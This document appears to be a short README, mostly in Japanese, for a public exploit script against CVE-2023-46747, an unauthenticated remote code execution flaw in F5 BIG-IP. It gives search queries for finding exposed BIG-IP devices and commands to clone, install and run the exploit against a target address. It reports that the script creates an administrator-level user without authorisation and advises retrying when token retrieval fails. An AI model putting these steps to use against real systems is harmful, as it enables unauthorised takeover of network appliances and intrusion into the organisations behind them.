CVE 2023 46747 RCE

 (title="BIG-IP®" || icon_hash="-335242539")

 title:"BIG-IP®"

https://my.f5.com/manage/s/article/K000137353

1. 現時点では、ここでのユーザーはadminのみです。

2. スクリプトを実行します。

 git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

コマンドが正常に実行されました:

3. ここでは、新しいユーザーが承認なしで正常に作成されました。

一部のバージョンでは悪用が失敗します。参照: https://twitter.com/joel_land/status/1729147886615818732。

1. Q: トークンの取得に失敗しましたか?
   A: 権限のないユーザーの作成は 100% 成功するわけではないため、テスト サイトに脆弱性が存在しないとは言えません。何らかの理由で最初のステップでユーザーを作成しないと、2 番目のステップでトークンを取得できない場合があります。したがって、私の提案は、さらに数回試してみることです。機能しない場合は、実際には脆弱性が存在しないことを意味する可能性があります。

このスクリプト https://github.com/BishopFox/bigip-scanner を使用して、F5 BIG-IP バージョン情報を収集できます。それは素晴らしい！

プロジェクトディスカバリー/nuclei-templates#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747